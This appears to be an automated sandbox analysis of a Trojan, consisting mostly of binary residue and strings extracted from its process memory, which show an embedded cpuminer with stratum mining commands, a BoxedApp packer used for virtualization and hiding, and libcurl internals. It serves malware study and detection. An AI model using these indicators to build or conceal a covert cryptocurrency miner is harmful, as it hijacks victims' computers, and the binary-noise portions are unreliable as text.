..fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R
.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....
u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2..
..{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N
....* [email protected]!..Y......w
`G........070411175657Z0!..Z`[email protected].*q..080403172017Z0!..l....I..
.Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1
..7<.....e..010207211822Z0...*.H............N...wS...d.....f..8j...
...).-..z.^...F..K.(|.4Wa&?.....GQ...59Wg%[email protected]......
..C. .....4Shn...#.....\q...(...#5 ..



GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "e3a9ed37247caa7391c0c49e246a368b:1407186311"
Last-Modified: Mon, 04 Aug 2014 21:05:11 GMT
Date: Tue, 05 Aug 2014 02:49:38 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0...0......0...*.H........0..1.0...U....US1.0...U....VeriSig
n, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at htt
ps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signin
g 2009-2 CA..140804210002Z..140818210002Z0...0!.....V..t..'.F(z....121
202220203Z0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100
722072726Z0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100
930040708Z0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091
029040207Z0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100
514054218Z0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091
[email protected]!.........}..Dt...!..090
922192227Z0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100
523060224Z0!...,.P.C......*.....100303082219Z0!...NRPL.............100
413090225Z0!....1w....d.&..8....091026111702Z0!......F....e........090
608081352Z0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100
219210742Z0!......Q_.G..|.......091009145530Z0!........>..O...=72..
100616160934Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..
100922142243Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..&l
t;K...101004225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^....
......091203194409Z0!....B....d...*[email protected]!.......m. .V..
...~..101111134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:
......100602074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,
s.....101011182226Z0!....Um..}.8)........100324085953Z0!....,u.box
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

nt32.exe_1560:

.text
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
wHN`?-G}
@%u.:
@.kAt
Mdk.cH
/%SE5y
fv-n}
I.raf
ku%X)k
0Gs%D
@.OyQ
,X%uv
yF%3X
.Xc3rf
U8;%dy
V.GRxSN&$
v2.0.50727
a.exe
System.Windows.Forms
stub_2.netrsrc.resources
System.IO
.ctor
System.Resources
System.Globalization
System.Reflection
System.CodeDom.Compiler
System.Diagnostics
.cctor
System.Runtime.InteropServices
System.Text
System.Text.RegularExpressions
System.Threading
stub_2.Properties
System.Configuration
System.Runtime.CompilerServices
3System.Resources.Tools.StronglyTypedResourceBuilder
2.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
9.0.0.0
1.0.0.0
$ac045e25-5d9e-42b8-a1ce-4c3a95960eae
_CorExeMain
mscoree.dll
stub_2.netrsrc

nt32.exe_1560_rwx_00400000_0002A000:

.text
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
wHN`?-G}
@%u.:
@.kAt
Mdk.cH
/%SE5y
fv-n}
I.raf
ku%X)k
0Gs%D
@.OyQ
,X%uv
yF%3X
.Xc3rf
U8;%dy
V.GRxSN&$
v2.0.50727
a.exe
System.Windows.Forms
stub_2.netrsrc.resources
System.IO
.ctor
System.Resources
System.Globalization
System.Reflection
System.CodeDom.Compiler
System.Diagnostics
.cctor
System.Runtime.InteropServices
System.Text
System.Text.RegularExpressions
System.Threading
stub_2.Properties
System.Configuration
System.Runtime.CompilerServices
3System.Resources.Tools.StronglyTypedResourceBuilder
2.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
9.0.0.0
1.0.0.0
$ac045e25-5d9e-42b8-a1ce-4c3a95960eae
_CorExeMain
mscoree.dll
stub_2.netrsrc

cvtres.exe_432:

.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
66665\\\\
\\\\5\\\\
666656666
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
zcÁ
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
l$D9.tO
FTPSW
u$D
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
P`.data
.edata
[email protected]
SShPi
SSh}i
purl/
j.RPj
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
 malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
8 8$8(8,808
2 2$2(2,2024282
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
ftp.c
url.c
